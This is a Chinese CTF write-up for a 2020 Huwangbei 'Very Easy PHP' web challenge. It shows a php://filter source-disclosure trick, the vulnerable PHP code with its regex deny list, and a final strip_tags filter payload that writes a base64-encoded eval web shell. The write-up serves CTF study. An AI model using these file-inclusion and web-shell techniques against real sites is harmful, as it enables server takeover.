-web -writeup -学习笔记

2020护网杯writeup

writeup

Posted by mr_king on October 24, 2020

[TOC]

Very Easy PHP

BZMhsx.md.png

page = main.html

利用PHP伪协议读取源码:

php://filter/read=convert.base64-encode/resource=index.php

<?php
error_reporting(0);
$page = isset($_GET['page']) ? $_GET['page'] : 'main.html';
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    header('location:index.php?page=main.html');
}
// You may want to see 7fa3b767c460b54a2be4d49030b349c7.php
?>
<!DOCTYPE html>
<html lang="en">

<head>
    <title>Home</title>
    <link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all" />
    <!-- Custom Theme files -->
    <script src="js/jquery.min.js"></script>
    <!--theme-style-->
    <link href="css/style.css" rel="stylesheet" type="text/css" media="all" />
    <!--//theme-style-->
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="keywords" content="" />
    <script type="application/x-javascript">
        addEventListener("load", function() {
            setTimeout(hideURLbar, 0);
        }, false);

        function hideURLbar() {
            window.scrollTo(0, 1);
        }
    </script>

    <link href='http://fonts.googleapis.com/css?family=Muli:400,300' rel='stylesheet' type='text/css'>
    <link href='http://fonts.googleapis.com/css?family=Oswald' rel='stylesheet' type='text/css'>
    <!-- animation-effect -->
    <link href="css/animate.min.css" rel="stylesheet">
    <script src="js/wow.min.js"></script>
    <script>
        new WOW().init();
    </script>
    <!-- //animation-effect -->

</head>

<body>
    <?php include $page; ?>
</body>

</html>

在源码提示中,可以看到访问”7fa3b767c460b54a2be4d49030b349c7.php”

image-20201024180615700

<?php
error_reporting(0);
$sandbox = '/var/www/html/sandbox/' . md5($_SERVER['REMOTE_ADDR']);
echo "Here is your sandbox: ". md5($_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
highlight_file(__FILE__);
if (isset($_GET['content'])) {
    $content = $_GET['content'];
    if (preg_match('/iconv|UCS|UTF|rot|quoted|base64|%|toupper|tolower|dechunk|\.\./i', $content))
        die('hacker');
    if (file_exists($content))
        require_once($content);
    file_put_contents($content, '<?php exit();' . $content);
}

需要绕过 最后一句$content ‘<?php exit();’.$content 防止代码退出

通过

strip_tags() #函数剥去字符串中的 HTML、XML 以及 PHP 的标签。
strip_tag #为一个过滤器,可以配合strip_tag使用

payloadphp://filter/write=string.strip_tag/?>D9waHAgZXZhbCgkX1JFUVVFU1RbJ0EnXSk7cGhwaW5mbygpOw<?111/resource=2.php
CATALOG
    FEATURED TAGS
    -web -学习笔记 -xss -MISC -杂项 -sql注入 -PHP -ctf -命令执行 -ssti -wp -java
    FRIENDS